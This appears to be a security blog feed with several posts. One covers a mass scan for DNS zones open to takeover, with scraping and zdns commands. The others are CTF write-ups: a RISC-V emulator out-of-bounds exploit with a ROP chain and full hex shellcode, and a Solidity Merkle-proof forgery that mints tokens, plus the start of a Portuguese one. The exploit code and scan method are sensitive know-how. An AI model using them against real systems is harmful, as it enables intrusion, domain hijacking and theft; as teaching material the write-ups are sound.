$ cat domains-poc.txt | while read name; do res=$(dig $name | grep -Po 'status: [^,]+'); echo "$name $res"; done > results.txt
In the results.txt
I found 8 zones vulnerable to DNS takeover reporting SERVFAIL
s - 3 under .com
, 1 under .com.br
, 1 under .com.np
and the rest in .app
, .bg
, .dev
. This was very scary as it was so easy to find. I double-checked them with dig +norecurse <DOMAIN> NS
and indeed they were pointing to the nameserver I was testing. I even logged into my Azure account to check whether I could verify that the names were available in the zone registration page, and indeed they were.
I thought that this could be a red flag - some nameservers could be authoritative for hundreds of thousands of zones, so 8 zones that could be taken over in a small set of 3728 (0.2%) seemed like a lot.
Now, if I wanted to step up the game, I’d need deeper access to SecurityTrail’s database. All I had at the moment was a search box limited to 10.000 results per query, paginated across pages limited to 100 results. Besides that, SecurityTrails’ API is limited to 50 queries per month and doesn’t include the SQL API unless you pay a minimum of U$500 for a subscription, which is slightly out of my budget for personal research projects.
I decided to go the easy way and just stick to the 10.000 limit, since I figured I wouldn’t be able to run billions of DNS queries in a short time anyway. So I made a quick Selenium script using the Undetected Chromedriver webdriver to scrape the data from SecurityTrails (this wouldn’t be so easy without Selenium, since SecurityTrails is behind CloudFlare):
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.by import By
import undetected_chromedriver as uc
import re
options = uc.ChromeOptions()
driver = uc.Chrome(use_subprocess=True, options=options)
driver.get("https://securitytrails.com/")
driver.maximize_window()
driver.add_cookie({
"name": "SecurityTrails",
"value": "<My SecurityTrails Session Cookie>"
})
def reverse_ns_sample(domain, output_file):
domains = []
lookup_url = f"https://securitytrails.com/list/ns/{domain}"
driver.get(lookup_url)
wait = WebDriverWait(driver, 12)
driver.implicitly_wait(5)
end_of_page = 100
end_of_results = -1
pagination_text = ''
while end_of_page != end_of_results:
sample = driver.find_elements(By.CSS_SELECTOR, "tbody>tr a")
try:
page_domains = [el.text for el in sample]
except Exception:
pass
output_file.write('\n'.join(page_domains) + '\n')
domains += page_domains
pagination = wait.until(
ec.presence_of_element_located(
(By.CLASS_NAME, 'pagination-details')
)
)
pagination_text = pagination.text.replace('\n', ' ').replace('\r', ' ')
pagination_numbers = re.search(
r'- ([\d,+]+) of ([\d,+]+) results',
pagination_text
).groups()
end_of_page = pagination_numbers[0]
end_of_results = pagination_numbers[1]
next_page_btns = driver.find_elements(By.CSS_SELECTOR, ".tooltip li a")
try:
for btn in next_page_btns:
if btn.text == '›':
btn.click()
except Exception:
pass
n_domains = len(domains)
print(f'[+] {n_domains} domains written to output file.')
return domains
total_n_domains = 0
with open('nameservers.txt') as f:
nameservers = list(map(lambda x: x.rstrip(), f.readlines()))
with open('output.txt', 'a+', encoding='utf-8') as output_file:
for nameserver in nameservers:
print(f'[+] Fetching results from {nameserver}')
try:
reverse_ns_sample(nameserver, output_file)
total_n_domains += 1
except Exception as e:
print(f'[+] Error on nameserver {nameserver}: "{e}"')
driver.quit()
print(f'[+] Found a total of {total_n_domains}.')
I was pretty surprised that I wasn’t blocked from the platform after a little more than 48 hours of queries, but these were all legitimate queries made by my browser after all. Or maybe I’m lying, I just made up this code, and in reality I went through thousands of pages of results manually, copying and pasting domains. Who knows…
After that it was time to actually check these domains. I was not going to do it sequentially with dig
, because I suspected half a million queries would take some time to finish, so I used zdns to make the queries (and jq to analyze the results):
$ cat output.txt | ./zdns SOA --threads 10 --name-servers=8.8.8.8,8.8.4.4 > soa-results.json
Note that I lowered the number of threads here instead of using the default of 1000 threads because I was worried that the queried servers would start refusing queries if I sent too many in a short amount of time. That would generate false positives, which wasn’t what I wanted. I’m not sure whether they do that or not, but it seemed possible.
Then I filtered for SERVFAIL
s and REFUSED
s:
$ jq -r 'select(.status == "SERVFAIL" or .status == "REFUSED") | "\(.name),\(.status)"' soa-results.json > lame-names.txt
The last thing I needed to do was get the nameservers of our lame names, in order to really validate that the information we got from SecurityTrails was accurate:
$ cat lame-names.txt | awk -F',' '{print $1}' | ./zdns NS --iterative --threads 3 > lame-ns-results.json
Finally I just went through these results, removing the ones that pointed to nameservers that weren’t into our base set. Whatever domains were left in the list were likely vulnerable to takeover :-)
For this analysis, I considered that a domain is likely vulnerable to takeover (LVT) if:
SERVFAIL
or REFUSED
status (lame delegation)This definition is pretty good for our purposes, but note that false positives could arise from it - the can-i-take-over-dns
repository could not be a completely accurate source, or a provider might refuse to answer a query for reasons other than the zone being available for register in their platform, such as the domain being “blacklisted/suspended” or rate-limiting being applied.
This experiment generated a set of 414.537 unique domains to analyze, which were distributed as follows (top 15):
From the base set of unique domains, the vast majority of domains (414.212 - 99.9%) responded to the SOA query with a NOERROR (98.72%) or NXDOMAIN (1.19%) status, which is pretty good, but 324 domains returned a SERVFAIL and 1 domain returned a REFUSED.
I went on to double-check the nameservers of these 325 domains to filter out the ones that weren’t actually pointing to our set of vulnerable nameservers. 112 (34%) of these domains had NS records that weren’t in our base set of nameservers, leaving us with 213 domains that were likely vulnerable to takeover. I won’t be releasing the list of domains for obvious reasons, but here’s how they were distributed in case you’re curious about it:
And here’s the full list of the parent domains in which the LVT domains were found:
Parent domain | # of LVT domains |
---|---|
com | 132 |
net | 13 |
org | 11 |
xyz | 5 |
io | 5 |
com.br | 4 |
ng | 3 |
ml | 3 |
nu | 2 |
nl | 2 |
info | 2 |
com.fj | 2 |
co.uk | 2 |
biz | 2 |
us | 1 |
uk | 1 |
team | 1 |
solutions | 1 |
shop | 1 |
pro | 1 |
org.fj | 1 |
net.fj | 1 |
in | 1 |
im | 1 |
host | 1 |
fm | 1 |
fi | 1 |
eu | 1 |
dev | 1 |
com.co | 1 |
com.au | 1 |
co.nz | 1 |
co.in | 1 |
co.fk | 1 |
co | 1 |
click | 1 |
cc | 1 |
ca | 1 |
bot | 1 |
az | 1 |
It’s clear that lame delegations are a problem for registrars, and that vulnerability to DNS takeovers is a problem for providers of DNS services. Below are some ideas to mitigate this sort of issue:
Lame Delegation Cleanup. Registrars can continuously check NS records in their zones for lame delegations, remove the corresponding records and notify the corresponding customers. If an NS record exists for a domain, but the associated nameservers don’t answer to queries for that domain, it has no function and should be deleted as quickly as possible. This is allegedly done by some registrars, but the protocols for it have to be reviewed and standardized considering this kind of risk - some entities can take up to 30 days notifying customers of the issue to effectively remove a lame NS record from their zones.
Nameserver Segregation. Providers can distribute their zones into sets of multiple distinct nameservers and assign them to customers randomly in a way that it becomes impractical, or even impossible, for an attacker to carry out DNS takeovers due to the high amount of attempts the attacker would have to perform in order to get at least one of the nameservers that were registered as authoritative for the affected domain. AWS and CloudFlare seem to implement controls which are similar to this approach. A simple way to extend this approach and effectively mitigate the issue: when processing the request for a new zone, the provider could just query the domain just like we did in this article to figure out whether it currently has a lame delegation to a subset of its nameservers. Then, if so, the provider could just avoid registering the zone in that subset of nameservers, using other nameservers from their pool instead. If the provider has no available nameservers to hand out after this procedure, then it should just return an error.
Detection & Response. Providers can keep logs of who is claiming which zones and develop automatic detection of strange patterns, such as a recently-removed zone being claimed by a different customer than the previous one, or the same customer trying to register many recently-removed zones previously owned by other customers in a short amount of time. This can then be used to notify customers of suspicious behavior and guide possible restrictive actions.
Developing Awareness. Vulnerable providers can warn customers explicitly when they try to remove a zone, informing them that they must remove the NS record at their registrar prior to removing the delegated zone.
This work was executed with limited resources and during the course of 3 days. To better understand this sort of issue it would be beneficial if someone were to try expanding it to a larger sample of domains, for example in the order of tens of millions. I imagine that one could possibly find many more LVT domains by having access to SecurityTrails’ SQL API and a big quota.
A tool could be written to check whether a domain is really available for registry in a provider using the provider’s API, or even go one step further and actually perform the takeover automatically. In cases where the provider implements some sort of nameserver segregation, the tool could try repeatedly until it gets the right nameserver. This kind of tool would make it easier to verify this sort of situation directly, although it might be a little bit hard to maintain, since it’s likely that providers will make changes to their infrastructure from time to time, possibly even mitigating takeover scenarios.
The same kind of mass experiment can be performed for the case of subdomain takeovers, although it was out of the scope of this work. If one knows of a base target domain associated with a service vulnerable to subdomain takeovers (like those described in EdOverflow’s can-i-take-over-xyz repo), one could use a reverse CNAME database such as SecurityTrail’s to find every domain that points to this service. For example, suppose Azure AppServices - which uses .azurewebsites.net
, a domain with more than 1 million subdomains - is vulnerable. One could use SecurityTrails’ database to get all of the more than 1 million subdomains of .azurewebsites.net
, check which ones fit the pattern of subdomain takeover (such as those returning NXDOMAIN
), and then check whether these domains have reverse CNAMEs that could be taken over. This could be an exhaustive task in some cases or not so much in others, depending on the size of the subdomain space for the analyzed service and on the % of dangling CNAMEs pointing to its subdomains.
After writing this article I found other data sources that provide interesting reverse lookups such as the reverse NS lookup that was used in this analysis. Although some of these are somewhat limited/expensive, data from these sources could be used instead of SecurityTrails’ to perform similar analyses, comparing or complementing the results:
Source | Interesting Lookups | Limits |
---|---|---|
SecurityTrails | Reverse NS, Reverse CNAME, Reverse MX | Max 10.000 results/lookup |
ViewDNS | Reverse NS, Reverse MX | Unknown |
DomainTools | Reverse NS | Subscription members only |
WhoisXMLAPI | Reverse NS, Reverse MX | 5 pages of 300 results/minute |
DNSLytics | Reverse NS, Reverse MX | Subscription members only (max 2.500 results/lookup) |
Some time later I improved the first draft of the scraper used in this analysis and added basic support for ViewDNS and WhoisXMLAPI lookups. I won’t be maintaining it for long probably, but it can be a starting point for others trying to perform this kind of analysis: Macmod/NameScraper.
The Forward DNS dataset from Rapid7’s Project Sonar could also be an interesting source of information for similar analyses. Although they don’t provide a web-based search tool, they provide daily compressed datasets of all sorts of DNS lookup results, in JSON, and going many years back. This data could be analyzed with zgrep
and jq
- like what @buckhacker did in 2018 in his How to do 55.000+ Subdomain Takeover in a Blink of an Eye article.
Although not widely exploited yet, DNS takeovers pose a relevant risk for customers, registrars and providers of DNS services. That risk could be increased by attackers having access to public databases mapping nameservers to domains for which they are authoritative (reverse NS lookups), and by the fast pace with which DNS zones are being registered and removed from DNS providers. Registrars and providers have the means to verify and mitigate these risks in their DNS services, but they are probably still not taking action as quickly and as effectively as they should to protect their customers.
Finally, about the title of the article - I did have lots of fun doing this, but I didn’t really profit anything, so for now I just hope this article was instructive for readers and that this will inspire researchers, registrars and providers to think about the problem =)
]]>HackTM CTF was an event hosted by WreckTheLine. It was a really nice event and there were some very cool challenges. As it is Carnival in Brazil, my teammates was not going to play and I decided to play alone anyway.
Despite I had not much time to spend in the challenges due to family stuff, I was able to solve one web challenge (Blog) in time. The remaining time I spent trying to solve the challenge of this write-up. It is worth to say that I spend some time trying to solve another web challenge, however, my mind was really focused in solving this pwn challenge.
CS2100 was a challenge of the pwn category. When you download the zip file and unzip, there was everything ready to run challenge and try it locally.
Basically, you could connect to the server and input your hexcoded shellcode, the server saves it to a temporary file and runs the emulator with this temporary file as argument.
#!/usr/bin/env python3
from tempfile import NamedTemporaryFile
from subprocess import check_output, Popen, STDOUT, DEVNULL
def print_banner():
print("""
_____ _____ ___ __ ___ ___
/ ____|/ ____|__ \/_ |/ _ \ / _ \
| | | (___ ) || | | | | | | |
| | \___ \ / / | | | | | | | |
| |____ ____) |/ /_ | | |_| | |_| |
\_____|_____/|____||_|\___/ \___/
""")
def main():
print_banner()
s = input("Please enter your code (hex-encoded):\n")
# Remove all whitespace
s = ''.join(s.split())
try:
d = bytes.fromhex(s)
except ValueError:
print("Invalid hex!")
exit()
with NamedTemporaryFile() as temp_file:
temp_file.write(d)
temp_file.flush()
filename = temp_file.name
print("\nOutput:")
with Popen(["./main", filename], stderr=STDOUT, stdin=DEVNULL) as process:
process.wait()
if __name__ == "__main__":
main()
The binary main
was a RISC-V emulator. The organizers were kind enough to provide the source code of this binary, it was very good because it would be too hard and time consuming to reverse engineering it.
The first thing that I tried was to read the source code and look for vulnerabilities. Quickly, I found a buffer overflow in the read_file
function at main.c
. Let’s look what happens in main
function:
nt main(int argc, char* argv[]) {
if (argc != 2) {
printf("Usage: rvemu <filename>\n");
exit(1);
}
// Initialize cpu, registers and program counter
struct CPU cpu;
cpu_init(&cpu);
// Read input file
read_file(&cpu, argv[1]);
...
}
The main function allocates a CPU
struct in the stack, then it initializes it through the function cpu_init
:
void cpu_init(CPU *cpu) {
cpu->regs[0] = 0x00; // register x0 hardwired to 0
cpu->regs[2] = DRAM_BASE + DRAM_SIZE; // Set stack pointer
cpu->pc = DRAM_BASE; // Set program counter to the base address
}
Next, the main function reads a file through the function read_file
:
void read_file(CPU* cpu, char *filename)
{
...
// copy the bin executable to dram
memcpy(cpu->bus.dram.mem, buffer, fileLen*sizeof(uint8_t));
...
}
Now, let’s look carefully at the CPU
, BUS
and DRAM
structs:
typedef struct CPU {
uint64_t regs[32]; // 32 64-bit registers (x0-x31)
uint64_t pc; // 64-bit program counter
uint64_t csr[4069];
struct BUS bus; // CPU connected to BUS
} CPU;
typedef struct BUS {
struct DRAM dram;
} BUS;
#define DRAM_SIZE 1024*1024*1
#define DRAM_BASE 0x80000000
typedef struct DRAM {
uint8_t mem[DRAM_SIZE]; // Dram memory of DRAM_SIZE
} DRAM;
We can see by the code above that mem
is an array with size 1048576. Also, note that there’s no bound check when memcpy
is executed! It is cleary a buffer overflow here. Nonetheless, the binary was compiled with stack canary
and then bug was useless.
My first idea was to craft a shellcode that execute /bin/sh
and give me a shellcode. But, how can we execute syscalls in this architecture? As a total noob I had to Google for it and found that there’s a instruction called ecall
. However, if we look at the source code, there’s no implementation for this instruction. 😥 Besides, it would not work anyway! Why? Well, even if we get a shell, we could not interact with it, because the server would not read any more data after we send our shellcode.
void exec_ECALL(CPU* cpu, uint32_t inst) {}
My next idea was to somehow get RIP control and pwn the challenge. But, how? Well, while playing a bit with the binary and reading about the instructions of the architechture, I eventually found two interesting instructions: ld and sd.
Now, let’s take a look at how those instructions are defined in the source code:
void exec_LD(CPU* cpu, uint32_t inst) {
// load 8 byte to rd from address in rs1
uint64_t imm = imm_I(inst);
uint64_t addr = cpu->regs[rs1(inst)] + (int64_t) imm;
cpu->regs[rd(inst)] = (int64_t) cpu_load(cpu, addr, 64);
print_op("ld\n");
}
void exec_SD(CPU* cpu, uint32_t inst) {
uint64_t imm = imm_S(inst);
uint64_t addr = cpu->regs[rs1(inst)] + (int64_t) imm;
cpu_store(cpu, addr, 64, cpu->regs[rs2(inst)]);
print_op("sd\n");
}
Basically, as there’s no bounds check, we can read and write out-of-bounds! But, how can we get RIP control? Where should we write? If you remember how the CPU struct is initialized, you may notice that the sp
register points to nearly the end of the mem
array. Let’s take a look at how the stack is when the execution ends:
Long story short: If we read at sp+8
, we will hit the stack canary! Therefore, we can get RIP control overwriting the main return address at sp+24
! Cool.
Finally, we can resume our shellcode into:
__libc_start_call_main+128
into a register, so we can calculate the addresses of needed functions and gadgetsret
gadget and store into sp+24
pop rdi ; ret
gadget and store into sp+32
sp+56
and store into sp+40
system
and store into sp+48
sp+56
address pointerAs we cannot interact with a shell, we need to make system executes a command that returns the flag. Also, we know that the flag is in the same folder and it is a file called flag
, so, if we can execute cat f*
, it will be enough.
I choose to place the command in the end of my shellcode, so I could use pc
pointer to load it into a register and later store it to a stack address.
Finally, the final shellcode was:
ld a0, 24(sp) ; load __libc_start_call_main+128 address at a0
addi a0, a0, -128 ; subtract 128 from __libc_start_call_main+128
addi a1, a0, -58 ; get 'ret' gadget address
sd a1, 24(sp) ; store ret gadget address at stack
lui a1, 0x6d5 ; load 0x6d5000 at a1
srli a1, a1, 12 ; shift right a1 by 12
add a2, a0, a1 ; get 'pop rdi ; ret' gadget address
sd a2, 32(sp) ; store 'pop rdi ; ret' gadget address at stack
lui a1, 0x27050 ; load 0x27050 at a1
srli a1, a1, 12 ; shift right a1 by 12
add a2, a0, a1 ; get 'system' addr
sd a2, 48(sp) ; write 'system' addr stack
ld a1, 56(sp) ; get stack address
sd a1, 40(sp) ; write stack address to create a pointer
auipc a1,0x0 ; load pc address at a1
ld a2, (a1) ; load stack address pointed by pc
sd a2, 288(sp) ; write command 'cat f*' at stack
I used this gem to get the asm of the shellcode. I just had to change the generated code to little indian
in order to make it working in the challenge.
Finally, our hex coded shellcode was:
03358101130505f8930565fc233cb100b7556d0093d5c5003306b5002330c102b705052793d5c5003306b5002338c102833581032334b1029705000003b605002334c112000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063617420662a00
When we ran it, we got the flag:
I solved this challenge when the CTF was already over and I did not read any write-ups before writing this one. Probably it was not the best solution, but as Gynvael always says: “A solution is always a solution”. Even it was the best, the worst or the unintended, it still is a solution. Also, I tested everything locally, I believe the same idea would work on the CTF server if we adjust the libc offsets.
]]>NahamCon EU CTF started on December 16th and lasted 24 hours. It had all the most common types of challenges such as web, pwn, reverse, crypto, etc. I could not play the entire event, so I dedicated most of my play time at the Web3 challenges since it’s not yet too common in CTFs and I always have a good time solving challenges like this.
Big thanks to Halborn for providing the web3 challanges :-)
The challenge itself is not difficult once you understand some core concepts of solidity, a programming language used to creat smart contracts from the Ethereum network, and a little bit of how XOR works.
So, I’ll try here to bring as much detail as I can even in some basic things from this world.
The challenge is called Merkle Heist and had at the end of the CTF a total of 11 solves.
In order to interact with the smart contract deployed in our private RPC URL I used Brownie Framework. It is a Python-based development and testing framework for smart contracts targeting the Ethereum Virtual Machine.
Here’s a quick link for instalation: Install Brownie
Before we start analyzing the vulnerable contract, we need configure our environment to communicate with the Ethereum private node that was given to us.
In order to accomplish this, we need to tell brownie where to connect when running our tests. We can do that by creating a custom network passing the private RPC URL as parameter.
Run: brownie networks add Ethereum CTF-Merkle-heist host=https://ctf.nahamcon.com/challenge/41/aa0e6c2d-efea-455f-8802-83c8df461a1d chainid=1337
Replace the host parameter with your private RPC URL.
Now, brownie will be able to interact with the contract deployed for the challenge.
When we download the zip file, we get a bunch files that we’ll need to analyze to solve the challenge. But before that, let’s find out what’s the condition we need to pass to solve it.
Inside the scripts
folder we see the challenge.py
file. It basically deploys the contract we must target and has the condition to solve it. Let’s first check the solve
function:
def solved():
token = SimpleToken[-1]
# You should mint 100000 amount of token.
if token.totalSupply() == 200000:
return True, "Solved!"
else:
return False, "Not solved, you need to mint enough to solve."
That first comment says it all, we must mint 100000 STK
(Simple Tokens) to beat it.
Crypto minting basically refers to the process of creating new coins through verification of data, creation of new blocks, and documentation of the verified information on a blockchain network through Proof of Stake consensus. From 101blockchains
Let’s take a look now at the deploy function:
def deploy():
ADMIN = accounts[9]
token = SimpleToken.deploy('Simple Token', 'STK', {'from': ADMIN})
_merkleRoot = 0x654ef3fa251b95a8730ce8e43f44d6a32c8f045371ce6a18792ca64f1e148f8c
airdrop = Airdrop.deploy(token, 1e5, _merkleRoot, 4, {'from': ADMIN})
token.setAirdropAddress(airdrop, {'from': ADMIN})
merkleProof = [
int(convert.to_bytes(ADMIN.address).hex(),16),
0x000000000000000000000000feb7377168914e8771f320d573a94f80ef953782,
0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6,
0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563
]
airdrop.mintToken(merkleProof)
The deploy function is also pretty straightforward:
simpleToken
contract (We’ll talk about it more later)airdrop
contractsetAirdroppAddress
from the token contract. (So they can communicate correctly)mintToken
from the airdrop contract passing the merkleProof as parameterThis is all we need to know from this file. Now let’s understant what exactly is going on in each step.
The deploy
function is setting the ADMIN account with a local account from that chain. Let’s take Ganache, from trufflesuite, as an example. Ganache creates a personal Ethereum blockchain which can be used to run test, execute commands and make inspections in the blockchain.
The image above represents a local ganache client running on my machine. I can use it to deploy contracts and look for bugs or develop awesome contracts, for example. As you can see, it generates a few (10) local accounts with 100 ETH balance and runs on my localhost:7545.
With that being said, the admin account is the one located at index 9 of the local accounts
array created for the challenge.
Here, the script is deploying the simpleToken contract present inside de contracts
folder (We’ll analyze it shortly), passing two parameter:
Simple Token
STK
ADMIN
We’ll talk more about this later, but let’s save this constant.
Deploy the airdop
contract passing a few parameters:
100000
merkleRoot
constantmerkleProof
array: 4
ADMIN
Now that we know our goal to solve the challenge we must find a way to mint these extra 100000 STK. The simpleToken.sol
contract implements this mint
function:
function mint(address addr, uint256 amount) external{
require(msg.sender == airdropAddress, "You can't call this");
_mint(addr, amount);
}
This require
is very clear. In order to mint tokens, the sender must be the airdrop contract, we cannot do this directly from our account. We must find a way inside the airdrop contract to mint the tokens we need.
There’s a function that we have to attack for sure in this contract, mintToken
:
function mintToken(bytes32[] memory merkleProof) external {
require(!dropped[msg.sender], "Already dropped");
require(merkleProof.length == proofLength, "Tree length mismatch");
require(address(uint160(uint256(merkleProof[0]))) == msg.sender, "First Merkle leaf should be the msg.sender's address");
require(proofHash(merkleProof) == merkleRoot, "Merkle proof failed");
dropped[msg.sender] = true;
token.mint(msg.sender, dropPerAddress);
_latestAcceptedProof = merkleProof;
}
In order to mint out tokens, we must pass these four conditions:
dropped
mapping. Which means that we cannot mint tokens more than once with the same user.merkleProof
parameters that we pass must have its length equal to 4merkleProof
parameter must contain the address of the caller of the function (our account)proofHash
function passing the merkleProof
as parameter must be equal to the merkleRoot
constant defined instants ago.Alright, after all that introduction we know where to look at. Let’s start bypassing these annoying checks and solve it!
require(!dropped[msg.sender], "Already dropped");
This require
checks if the msg.sender (us) has already minted any tokens. To bypass this we only need a fresh account. So no headaches here.
✅ Use an account that hasn’t minted any tokens in this contract.
require(merkleProof.length == proofLength, "Tree length mismatch");
This function accepts a bytes32 array as parameter called merkleProof
. The challenge.py
file has an example that we can use to illustrate:
merkleProof = [
int(convert.to_bytes(ADMIN.address).hex(),16),
0x000000000000000000000000feb7377168914e8771f320d573a94f80ef953782,
0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6,
0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563
]
✅ We need to make sure that the merkleProof
we send has a length of 4.
require(address(uint160(uint256(merkleProof[0]))) == msg.sender, "First Merkle leaf should be the msg.sender's address");
Let’s create a script that will solve the challenge. This first part here is to calculate the first argument of the merkleProof
array.
from brownie import Airdrop, accounts, Wei, convert
def test_solve():
# Set the deployed contract address
contract = Airdrop.at("0xA15BB66138824a1c7167f5E85b957d04Dd34E468")
# Get the first local account to be out account for testing
account = accounts[0]
# Print some variables to stdout
print(f"[+] Contract: {contract}")
print(f"[+] Account: {account}")
print(f"[+] Admin Account: {accounts[9]}")
# Calculate the first argument of our array
merkleProof = [
convert.to_bytes(account.address).hex()
]
#Print it
print(merkleProof)
Running this we get:
(address(uint160(uint256(merkleProof[0]))
Only takes the least 20 significant bytes of a 32 byte array to consider as our address. If we send:
0x000000000000000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266
or 0xa1b2c3d4e5f6000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266
they will both be accepted in this third check since the 12 most significant bytes are not considered.
✅ Calculate the first parameter of our merkleProof
require(proofHash(merkleProof) == merkleRoot, "Merkle proof failed");
\
This we’ll have to work a little harder to bypass. It requires that the function proofHash
passing our merkleProof
as argument to be equal that merkleRoot
constant that we defined earlier and was passed to the constructor.
Let’s take a look at the proofHash
function:
function proofHash(bytes32[] memory nodes) internal pure returns (bytes32 result) {
result = pairHash(nodes[0], nodes[1]);
for (uint256 i = 2; i < nodes.length; i++) {
result = pairHash(result, nodes[i]);
}
}
It accepts a bytes32 array as a parameter (Our merkleProof) and call another function pairHashes
with the merkleProof
elements.
The function pairHashes
looks like this:
function pairHash(bytes32 a, bytes32 b) internal pure returns (bytes32) {
return keccak256(abi.encode(a ^ b));
}
This function simply does the following:
Keccak256 is a cryptographic function built into solidity. This function takes in any amount of inputs and converts it to a unique 32 byte hash.
The diagram below represents the flow inside the proofHash
function.
So, we need to figure out a way to achieve the same merkleRoot
as the one set in the constructor. In order to accomplish this, we must abuse how XOR works. We know that in the first case, the one represented in the challenge.py
file, the following happened:
0x000000000000000000000000a0Ee7A142d267C1f36714E4a8F75612F20a79720 ^ 0x000000000000000000000000feb7377168914e8771f320d573a94f80ef953782
=
0x5e594d6545b7329847826e9ffcdc2eafcf32a0a2
So, weed need that the parameter for the first call to keccak256 inside the pairHash
function to be equal 0x5e594d6545b7329847826e9ffcdc2eafcf32a0a2
to achive the same hash.
According to XOR propertis, we have:
A ^ B = C --> A ^ C = B
We are missing only the second paramenter of our fake merkleProof
, let’s calculate the bytes32 that we need to get the same hash:
0xf39fd6e51aad88f6f4ce6ab8827279cfffb92266 ^ 0x5e594d6545b7329847826e9ffcdc2eafcf32a0a2 = 0xadc69b805f1aba6eb34c04277eae5760308b82c4
0xf39f… is our test account 0x5e59… is the result we need to be hashed to get the same merkle root 0xadc6… is now the second element of our merkle proof array
We have now, a merkleProof that will all checks and mint some tokens for us:
merkleProof = [
0x000000000000000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266, # Our testing account
0x000000000000000000000000adc69b805f1aba6eb34c04277eae5760308b82c4, # New element calculated
0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6,
0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563
]
Elements at index 2 and 3 remained the same.
✅ Created the new merkle proof array with our account
After all that calculation, the final script would look something like this:
from brownie import Airdrop, accounts, Wei, convert
def test_solve():
contract = Airdrop.at("0xA15BB66138824a1c7167f5E85b957d04Dd34E468")
account = accounts[0]
print(f"[+] Contract: {contract}")
print(f"[+] Account: {account}")
print(f"[+] Admin Account: {accounts[9]}")
merkleProof = [
0x000000000000000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266,
0x000000000000000000000000adc69b805f1aba6eb34c04277eae5760308b82c4,
0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6,
0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563
]
contract.mintToken(merkleProof, {"from": account})
print(f"\n[+] Last accepted proof: {contract.latestAcceptedProof()}")
All we have to do now is go to the platform and hit that juicy solve button and get our points! 🏁🏁🏁
This was indeed an easy challenge, the main idea here was to give an introduction to this world of web3 hacking and provide some info on how to start, what to use and a few solidity tips. I myself have been playing around with it for just a couple of months but it has been quite fun. If you wanna know more, hack more web3 challenges, I strongly recommend you to start at ethernaut wargame from open zeppelin.
I know that I skipped a few things about solidity, brownie and even merkle trees themselves. I’ll strongly agree the you check out the references below.
If you wanna discuss more about it, feel free to reach me Twitter or linkedin :-)
thanks for reading 👽 👽 👽
Neste write-up, explico o desafio web Jogo da Velha
e o método proposto de solu.. hacking :)
Pra facilitar a vida de quem estiver começando, serei bastante detalhista em alguns pontos, focando na linha de raciocínio para a solução do desafio.
Junte-se a centenas de atletas ao redor do mundo para competir pelo título de melhor jogador do ano na Copa do Mundo de Jogo da Velha!!
A flag é a senha do usuário "admin"
Neste desafio, você tem um Jogo da Velha, onde você compete com a “inteligência artificial” do servidor - que é apenas um random, claro :)
Após se registrar e logar, você pode criar novos jogos e jogar contra a máquina, além de listar os jogos já criados e retomar.
O código-fonte da aplicação está disponível, permitindo uma análise mais aprofundada do seu comportamento.
Para quem não teve acesso e quiser experimentar, disponibilizei o código do desafio no github.
O código vem com o arquivo docker-compose.yml, pra facilitar o setup, principalmente porque temos uma composição de aplicação e banco de dados MySQL.
Por isso, para iniciar o desafio, você precisa ter instaladas as ferramentas abaixo:
Com as ferramentas instaladas, você pode entrar na pasta e digitar:
$ docker compose up
Obs: o container do banco de dados demora BASTANTE a ser criado na primeira vez (pelo menos uns 5 minutos) e o container da aplicação fica dando erro e reiniciando até que o banco esteja disponível. Obs: já sei como melhorar esse item, mas não tive tempo de trabalhar nisso antes do CTF.
Exemplo de saída:
neptunian:~/safe/bhack-ctf-jogo-da-velha$ docker compose up
[+] Running 2/2
⠿ Container bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 Created 0.5s
⠿ Container bhack-ctf-jogo-da-velha-tic-tac-toe-1 Created 0.3s
Attaching to bhack-ctf-jogo-da-velha-jogo-da-velha-db-1, bhack-ctf-jogo-da-velha-tic-tac-toe-1
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28 23:22:30+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.29-1.el8 started.
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28 23:22:30+00:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql'
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28 23:22:30+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.29-1.el8 started.
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28 23:22:30+00:00 [Note] [Entrypoint]: Initializing database files
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:22:30.951563Z 0 [System] [MY-013169] [Server] /usr/sbin/mysqld (mysqld 8.0.29) initializing of server in progress as process 42
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:22:30.983855Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Serving Flask app 'app' (lazy loading)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Environment: production
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | WARNING: This is a development server. Do not use it in a production deployment.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | Use a production WSGI server instead.
